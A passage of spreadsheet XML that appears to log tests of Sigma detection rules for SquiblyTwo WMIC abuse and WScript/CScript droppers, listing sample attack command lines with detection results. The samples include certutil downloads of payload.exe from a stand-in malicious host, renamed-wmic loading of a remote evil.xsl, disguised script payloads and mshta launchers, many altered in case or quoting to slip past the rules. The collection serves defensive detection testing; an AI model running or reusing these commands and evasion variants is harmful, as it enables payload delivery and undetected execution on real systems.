        </is>
      </c>
      <c r="C2621" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2621" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2621" s="44" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -spLit -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2621" s="44" t="n"/>
      <c r="J2621" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2621" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2622" ht="15.75" customHeight="1" s="42">
      <c r="A2622" s="43" t="n"/>
      <c r="B2622" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2622" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2622" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2622" s="44" t="inlineStr">
        <is>
          <t>certutil -"urlcache" -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2622" s="44" t="n"/>
      <c r="J2622" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2622" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2623" ht="15.75" customHeight="1" s="42">
      <c r="A2623" s="43" t="n"/>
      <c r="B2623" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2623" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2623" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2623" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F2623" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2623" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2623" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2623" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2623" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2623" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2624" ht="15.75" customHeight="1" s="42">
      <c r="A2624" s="43" t="n"/>
      <c r="B2624" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2624" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2624" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2624" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /"format:"\\AttackerServer\share\evil.xsl""</t>
        </is>
      </c>
      <c r="F2624" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2624" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2624" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2624" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2624" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2625" ht="15.75" customHeight="1" s="42">
      <c r="A2625" s="43" t="n"/>
      <c r="B2625" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2625" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2625" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2625" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /foRmAt:"\\AtTAckErsErVeR\sharE\eVil.xSl"</t>
        </is>
      </c>
      <c r="F2625" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2625" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2625" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2625" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2625" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2626" ht="15.75" customHeight="1" s="42">
      <c r="A2626" s="43" t="n"/>
      <c r="B2626" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2626" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2626" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2626" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FOrmAT:"\\aTtaCKerserVEr\shaRe\EVil.XSl"</t>
        </is>
      </c>
      <c r="F2626" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2626" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2626" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2626" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2626" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2627" ht="15.75" customHeight="1" s="42">
      <c r="A2627" s="43" t="n"/>
      <c r="B2627" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2627" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2627" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2627" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FoRMAt:"\\ATTAcKeRSerVER\shaRE\eVIl.xSL"</t>
        </is>
      </c>
      <c r="F2627" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2627" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2627" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2627" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2627" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2628" ht="15.75" customHeight="1" s="42">
      <c r="A2628" s="44" t="n"/>
      <c r="B2628" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2628" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2628" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2628" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe -"node:127.0.0.1" process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F2628" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2628" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2628" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2628" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2628" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2628" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2629" ht="15.75" customHeight="1" s="42">
      <c r="A2629" s="44" t="n"/>
      <c r="B2629" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2629" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2629" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2629" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NoDE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F2629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2629" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2629" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2629" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2630" ht="15.75" customHeight="1" s="42">
      <c r="A2630" s="44" t="n"/>
      <c r="B2630" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2630" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2630" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2630" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NOdE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F2630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2630" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2630" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2630" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2631" ht="15.75" customHeight="1" s="42">
      <c r="A2631" s="44" t="n"/>
      <c r="B2631" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2631" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2631" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2631" s="44" t="inlineStr">
        <is>
          <t>cscript.exe C:\ProgramData\payload.js</t>
        </is>
      </c>
      <c r="F2631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2631" s="43" t="n"/>
      <c r="J2631" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2631" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2632" ht="15.75" customHeight="1" s="42">
      <c r="A2632" s="44" t="n"/>
      <c r="B2632" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2632" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2632" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2632" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wscript.exe C:\Windows\Temp\updater.exe &amp;&amp; C:\Windows\Temp\updater.exe C:\Windows\Temp\payload.vbs</t>
        </is>
      </c>
      <c r="F2632" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2632" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2632" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2632" s="44" t="inlineStr">
        <is>
          <t>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2632" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2632" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2633" ht="15.75" customHeight="1" s="42">
      <c r="A2633" s="44" t="n"/>
      <c r="B2633" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2633" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2633" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2633" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:vbs C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2633" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2633" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2633" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2633" s="4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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2633" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2634" ht="15.75" customHeight="1" s="42">
      <c r="A2634" s="44" t="n"/>
      <c r="B2634" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2634" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2634" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2634" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:vBs C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2634" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2634" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2634" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2634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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2634" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2635" ht="15.75" customHeight="1" s="42">
      <c r="A2635" s="44" t="n"/>
      <c r="B2635" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2635" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2635" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2635" s="44" t="inlineStr">
        <is>
          <t>wscript.exe -"/E:vbs" C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2635" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2635" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2635" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2635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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2635" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2636" ht="15.75" customHeight="1" s="42">
      <c r="A2636" s="44" t="n"/>
      <c r="B2636" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2636" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2636" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2636" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:VBS C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2636" s="4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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2636" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2637" ht="15.75" customHeight="1" s="42">
      <c r="A2637" s="44" t="n"/>
      <c r="B2637" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2637" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2637" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2637" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:vBS C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2637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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2637" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2638" ht="15.75" customHeight="1" s="42">
      <c r="A2638" s="44" t="n"/>
      <c r="B2638" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2638" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2638" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2638" s="44" t="inlineStr">
        <is>
          <t>wscript.exe /"/E:vbs" C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2638" s="44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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2638" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2639" ht="15.75" customHeight="1" s="42">
      <c r="A2639" s="44" t="n"/>
      <c r="B2639" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2639" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2639" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2639" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //e:VBS C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2639" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2639" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2639" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2639" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Cscript/Wscript Uncommon Script Extension Execution (99b7460d-c9f1-40d7-a316-1f36f61d52ee)</t>
        </is>
      </c>
      <c r="J2639" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2639" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2640" ht="15.75" customHeight="1" s="42">
      <c r="A2640" s="44" t="n"/>
      <c r="B2640" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2640" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2640" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2640" s="44" t="inlineStr">
        <is>
          <t>copy C:\Users\Public\malicious.vbs C:\Windows\System32\drivers\etc\legit.txt &amp;&amp; cscript //e:VBScript C:\Windows\System32\drivers\etc\legit.txt</t>
        </is>
      </c>
      <c r="F2640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2640" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2640" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2640" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2641" ht="15.75" customHeight="1" s="42">
      <c r="A2641" s="44" t="n"/>
      <c r="B2641" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2641" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2641" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2641" s="44" t="inlineStr">
        <is>
          <t>copy C:\Users\Public\malicious.vbs C:\Windows\System32\drivers\etc\legit.txt &amp;&amp; cscript //e:vBSCRiPt C:\Windows\System32\drivers\etc\legit.txt</t>
        </is>
      </c>
      <c r="F2641" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2641" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2641" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2641" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2641" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2642" ht="15.75" customHeight="1" s="42">
      <c r="A2642" s="44" t="n"/>
      <c r="B2642" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2642" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2642" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2642" s="44" t="inlineStr">
        <is>
          <t>copy C:\Users\Public\malicious.vbs C:\Windows\System32\drivers\etc\legit.txt &amp;&amp; cscript //e:vBsCRIpt C:\Windows\System32\drivers\etc\legit.txt</t>
        </is>
      </c>
      <c r="F2642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2642" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2642" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2642" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2642" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2643" ht="15.75" customHeight="1" s="42">
      <c r="A2643" s="44" t="n"/>
      <c r="B2643" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2643" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2643" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2643" s="44" t="inlineStr">
        <is>
          <t>copy C:\Users\Public\malicious.vbs C:\Windows\System32\drivers\etc\legit.txt &amp;&amp; cscript -"/e:VBScript" C:\Windows\System32\drivers\etc\legit.txt</t>
        </is>
      </c>
      <c r="F2643" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2643" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2643" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2643" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2643" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2644" ht="15.75" customHeight="1" s="42">
      <c r="A2644" s="44" t="n"/>
      <c r="B2644" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2644" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2644" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2644" s="44" t="inlineStr">
        <is>
          <t>mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run(""calc.exe""):window.close")</t>
        </is>
      </c>
      <c r="F2644" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2644" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2644" s="4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2644" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2644" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2645" ht="15.75" customHeight="1" s="42">
      <c r="A2645" s="44" t="n"/>
      <c r="B2645" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2645" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2645" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2645" s="44" t="inlineStr">
        <is>
          <t>copy script.vbs script.vbs.txt &amp;&amp; cscript //e:vbs script.vbs.txt</t>
        </is>
      </c>
      <c r="F2645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2645" s="43" t="n"/>
      <c r="J2645" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2645" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2646" ht="15.75" customHeight="1" s="42">
      <c r="A2646" s="44" t="n"/>
      <c r="B2646" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2646" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2646" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2646" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //E:vbs C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2646" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2646" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2646" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
